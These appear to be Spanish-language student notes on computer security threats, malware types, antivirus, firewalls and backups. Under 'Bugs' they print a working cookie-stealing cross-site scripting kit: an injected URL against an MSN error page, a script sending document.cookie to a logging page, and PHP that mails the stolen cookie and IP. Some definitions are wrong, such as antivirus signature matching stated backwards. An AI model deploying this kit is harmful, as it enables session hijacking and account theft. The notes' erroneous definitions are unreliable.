practica1

//__**TIPOS DE AMENAZA:**__// -__Accidentes de personal.__ -__Hackers__: Intrusos que pueden acceder al sistema sin permiso pero no lo modifican, sin permiso para practicar . ___Activos__: Aquello que dañan a su objetivo y lo modifican para su prorpio beneficio. - __Crackers__: Personas con el fin de hacer daño - __Antigüos empleados__: por venganza - __Piratas informáticos__: Informáticos a sueldo _ __Intencionadas__: - __Virus y malware__: imagenes sacadas de []
 * **Personas**. La mayoria de ataques provienen de personas que intencionada o acciendetalmente pueden causar grandes perdida.
 * **Pasivos**: -Son los que fisgan el sistema pero no lo modifican.
 * **Amenazas lógicas**.

- __Herramientas de seguridad__ - __Puertas traseras__ _ __Bugs__: Software incorrecto( imagen sacada de [] ) (aclaración: un bug no tiene nada que ver con **bug**s bunny) Un ejemplo de bug bastante frecuente en hotmail es:

Código:
 * Index.php**

 link 

Código:
 * ind.php**

<? $mysite = "http://www.ejemplo.com"; # <== Edit

$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E %3Cscript%20src%3Dhttp%3Awww.xxxx.com/nice.js%3E%3C/script%3E"; print ' ASD    '; ?>
 * log.php**

Código:

<? $cookie = $_GET['nice']; $ip = getenv("REMOTE_ADDR"); $Time = date("l dS of F Y h:i:s A");

$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time"; $subject = "cookie"; mail("ejemplo@hotmail.com", $subject, $msg);

header ("location: asd.gif"); ?>


 * nice.js**

Código:

location.href='http://www.ejemplo.com/log.php?nice='+escape(document.cookie) _ Mecanismos: -Contraseñas - Permisos de acceso - Seguridad en las comunicaciones: Criptografía - Actualizaciones - SAI (sistemas de comunicacion ininterrumpida): gracias a su batería suministra energía en caso de fallo eléctrico. tambien regula la calidad de la señal para evitar subidas o bajadas de tensión
 * __MEDIDAS DE SEGURIDAD:__**
 * **Prevención**: tratan de aumentar la seguridad de un sistema informático durante su funcionamiento normal para prevenir violaciones de seguridad
 * **Detección**: Existen herramientas para cada amenaza
 * **Recuperación**: el daño está hecho y se recurre a las copias de seguridad.

//__**TIPOS DE VIRUS Y MALWARE:**__// Malware: maliciuços software. software que puede resultar perjudicial

>, keyloggers. usan herramientas hacking para acceder a otro equipo dese un ordenador. se combaten con firewall.
 * **Virus**: Gusanos, troyanos, backdoors, sniffer. Programas habitualmente ocultos dentro de otros programas como e-mails, ficheros, etc... Se ejecutan automáticamente haciendo copias de si mismo haciendo copias de si mismo dentro de los programas a los que ha afectado. Dependiendo de su modo de ataque y programacion se denominan de distinta manera. se combaten con antivirus. Hay determinados virus que, debido a la simplicidad de su lenguaje, un antivirus no es capaz de detectar, como por ejemplo, el lenguanje en batch. (códigos guardados en un documento de texto con extensión .bat). obviamnete si la combinación de estas códigos en batch es muy larga el antivirus si lo puede detectar. el ordenador utiliza estos codigos para trabajar ( por ejemplo cuando se utilizar el terminal de windows con el @echo activado. este mismo es un código).
 * **Adware**: pop ups. se combaten con antivirus
 * **intrusos**: hackers, crackers, phone freakers (La meta de los phreakers es generalmente superar retos intelectuales de complejidad creciente relaccionados con incidencias de seguridad o fallos en los sistemas telefónicos que les permitan obtener privilegios no accesibles de forma legal.)

-Spam: correo basura no solicitar y suele estar relacionado con la publicidad. se combate con antispam. -Spyware: software que usa la conexión a internet para extraer informacion. se combate con un antispyware. -Dialers. cuelgan la conexion telefonica y establecen una conexion con un numero de tarificación especial.se combaten con antidialers. -Bugs: error de software que puede provocar daños en la información. -Exploits: codigos que se aprovechan de las vulnerabilidades de los programas para lanzar ataques de forma automática.se puede evitar con las actualizaciones del software. Una página en la que se pueden observar todo tipo de ejemplos de exploits es [|milw0rm]. -Jokes: mensajes de cadenas distribuidas normalmente por correo electrónico.

//__**ANTIVIRUS Y CORTAFUEGOS**__// Un antivirus es un programa que detecta, bloquea y elimina cualquier malware. no solo elimina virus, sino otras amenazas. Tiene una base de datos donde guarda códigos que identifican esos virus comparando los archivos con esos codigos y si no coinciden es que hay un virus. a esa base de datos se le llama firma de definiciones de virus. ejs: avast!. kaspersky, norton, McAFEE, antivir.

Un firewall es un programa que se usa para controlar las comunicaciones e impedir cualquier acceso no autorizado. el mas famoso es el zone alarm.

//__**COPIAS DE SEGURIDAD**__// Los backups son copias de todos los datos que nos permite recurrir a la informacion en caso de ser necesario. Para realizarse utilizan distintos dispositivos externos de almacenamiento. Lo más sencillo es tener una planificacion periódica y la copia cuanto mas reciente mejor. Se aconseja:
 * **Copia semanal de archivos nuevos**
 * **Copia mensual o trimestral de todo el equipo incluyendo carpetas y archivos.**